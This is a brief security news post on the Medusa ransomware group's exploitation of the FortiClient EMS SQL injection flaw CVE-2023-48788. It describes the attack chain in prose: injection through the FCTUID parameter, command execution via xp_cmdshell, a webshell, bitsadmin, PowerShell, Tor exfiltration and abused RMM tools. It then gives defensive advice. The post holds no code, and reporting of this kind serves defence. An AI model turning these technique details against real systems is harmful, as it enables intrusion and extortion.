Medusa Ransomware Leveraging Fortinet Vulnerability for Advanced Attacks

The Medusa ransomware group has been exploiting a critical SQL injection vulnerability in Fortinet’s FortiClient EMS software, identified as CVE-2023-48788. This flaw allows attackers to execute malicious code on vulnerable systems, providing a gateway for deploying ransomware.

According to Bitdefender, the vulnerability affects FortiClient EMS versions 7.2 to 7.2.2 and 7.0.1 to 7.0.10, which are used for endpoint management. Medusa has swiftly taken advantage of this flaw to target sectors such as healthcare, manufacturing, and education, launching sophisticated ransomware attacks.

The Medusa ransomware group is exploiting a vulnerability in Fortinet’s FortiClient EMS software (CVE-2023-48788) by sending malicious web requests that manipulate the FCTUID parameter, allowing them to execute arbitrary commands via the Microsoft SQL Server’s xp_cmdshell function. After gaining initial access, the attackers install a webshell to facilitate data exfiltration and payload delivery. Medusa uses tools like bitsadmin to transfer files and maintain persistence.

Medusa’s attack strategy demonstrates advanced capabilities in execution and evasion. Once inside, the group uses PowerShell scripts to execute commands, steal data, and launch its ransomware payload. Their malware, gaze.exe, disables services and includes files with Tor links for exfiltration. To avoid detection, Medusa also installs compromised versions of trusted remote monitoring and management (RMM) tools like ConnectWise and AnyDesk.

To protect against Medusa’s attacks, organizations should prioritize patch management, network segmentation, regular backups, and employee security training. As Medusa continues to refine its techniques, businesses must stay vigilant and adopt a multi-layered security approach.

Share this post :